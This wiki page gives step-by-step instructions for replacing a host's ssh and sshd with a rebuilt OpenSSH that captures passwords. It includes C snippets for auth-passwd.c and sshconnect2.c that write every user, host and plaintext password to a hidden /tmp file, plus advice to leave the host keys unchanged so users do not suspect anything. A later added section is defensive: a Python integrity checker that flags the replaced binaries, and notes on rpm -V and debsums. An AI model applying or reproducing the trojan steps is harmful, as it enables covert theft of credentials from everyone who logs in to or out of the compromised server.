Capturing ssh passwords on host using root privileges

From Notes_Wiki


Once we have root access to a machine, we can download the OpenSSH source code and modify it to capture passwords. We then compile this code and install it, so that passwords for all client and server ssh connections get captured. Note that this means passwords for ssh attempts from this host to other machines (using the ssh command) get captured along with passwords given during ssh logins to the sshd running on this machine.

This can be achieved with the following steps:

  1. Download latest openssh portable source code from http://www.openssh.org/portable.html
  2. Configure using './configure --with-tcp-wrappers --with-pam --with-rand-helper --with-md5-passwords --prefix=/ --sysconfdir=/etc/ssh --sbindir=/usr/sbin --bindir=/usr/bin/'
    --with-audit and --with-selinux cause problems during configure or make and hence should be avoided.
  3. make clean
  4. For capturing passwords given to sshd we need to modify the 'auth-passwd.c' file. The password is read in the function 'auth_passwd'. We can add the following code to log the password to a temporary file:
    FILE *capture_password;
    capture_password=fopen("/tmp/tmpDD302f", "a");
    fprintf(capture_password, "HOST localhost USER %s PASSWORD %s\n", authctxt->user, password);
    fclose(capture_password);
    Do not add the code inside an #ifdef block, so that it gets included irrespective of compilation choices.
  5. For capturing the password given to ssh, we need to modify the function 'userauth_passwd' in 'sshconnect2.c'. Note that we modify only 'sshconnect2.c', since most ssh clients use protocol version 2.0. If one wants to capture SSHv1 passwords as well, the function 'try_password_authentication' in 'sshconnect1.c' needs to be modified.
    FILE *capture_password;
    capture_password=fopen("/tmp/tmpDD302f", "a");
    fprintf(capture_password, "HOST %s USER %s PASSWORD %s\n", host, authctxt->server_user, password);
    fclose(capture_password);
    These lines should be inserted after the 'password = read_passphrase(prompt, 0);' call.
  6. 'make'
  7. 'make install'. Note that by default 'make install' does not overwrite files in '/etc/ssh', which is very good for us, since the host keys won't change and no one will suspect anything. If the keys changed, users might suspect that something has changed on the server.
  8. 'service sshd restart', so that the new ssh daemon takes over. Most probably existing connections do not get closed by this.
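From the defender's side, the weak point of the procedure above is step 7: 'make install' with prefix=/ drops a rebuilt ssh and sshd over the packaged binaries, and the rebuilt files no longer match the digests and sizes recorded at install time, even though the host keys in /etc/ssh stay the same. The following Python script is an added example, not code from the original page. It takes a baseline (SHA-256, size, mode) of a list of paths from a trusted state and later reports any path that has been modified, removed, or changed mode. The DEFAULT_PATHS list and the baseline file name are assumptions; the demo at the bottom runs on constructed files in a temporary directory rather than on the real binaries.

```python
"""Baseline-and-verify integrity check for SSH binaries.

Added example; not code from the original page. It records a SHA-256
digest, size and mode for each path in a baseline and later reports any
path whose recorded values no longer match. A rebuilt ssh/sshd installed
over the packaged binaries produces a different digest and size, so it
shows up as "modified". DEFAULT_PATHS is only an assumed default; the
demonstration at the bottom uses constructed files in a temp directory.
"""
import hashlib
import json
import os
import tempfile

# Paths the procedure on this page replaces (bindir=/usr/bin, sbindir=/usr/sbin).
# Assumed defaults; a real baseline would be taken right after package install.
DEFAULT_PATHS = ["/usr/bin/ssh", "/usr/sbin/sshd"]


def fingerprint(path):
    """Return {"sha256", "size", "mode"} for a file, or None if it is missing."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return None
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return {"sha256": h.hexdigest(), "size": st.st_size, "mode": st.st_mode & 0o7777}


def create_baseline(paths, baseline_file):
    """Write a JSON baseline for the given paths, taken from a trusted state."""
    baseline = {p: fingerprint(p) for p in paths}
    with open(baseline_file, "w") as f:
        json.dump(baseline, f, indent=2)
    return baseline


def verify_baseline(baseline_file):
    """Compare current files with the baseline; return {path: reason} for mismatches."""
    with open(baseline_file) as f:
        baseline = json.load(f)
    findings = {}
    for path, expected in baseline.items():
        current = fingerprint(path)
        if expected is None:
            if current is not None:
                findings[path] = "appeared"  # exists now, did not exist at baseline time
            continue
        if current is None:
            findings[path] = "missing"
        elif current["sha256"] != expected["sha256"] or current["size"] != expected["size"]:
            findings[path] = "modified"
        elif current["mode"] != expected["mode"]:
            findings[path] = "mode changed"
    return findings


def demo():
    """Constructed demonstration: two fake binaries, one gets replaced after baselining."""
    with tempfile.TemporaryDirectory() as d:
        ssh = os.path.join(d, "ssh")
        sshd = os.path.join(d, "sshd")
        for p in (ssh, sshd):
            with open(p, "wb") as f:
                f.write(b"packaged binary contents\n")  # constructed placeholder content
            os.chmod(p, 0o755)
        manifest = os.path.join(d, "baseline.json")
        create_baseline([ssh, sshd], manifest)
        # Simulate 'make install' dropping a rebuilt sshd over the packaged one.
        with open(sshd, "wb") as f:
            f.write(b"rebuilt binary with extra logging\n")  # constructed placeholder content
        return verify_baseline(manifest)


if __name__ == "__main__":
    print(demo())  # -> {'<tmpdir>/sshd': 'modified'}
```

Two practical points: the baseline file must be kept off the host (or on read-only media), because whoever has root to rebuild sshd can also rewrite a baseline stored next to it; and on a package-managed system the package database already holds the same kind of record, so 'rpm -V openssh-server openssh-clients' on RPM-based systems or 'debsums' on Debian-based systems flags the rebuilt binaries without any separate baseline.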
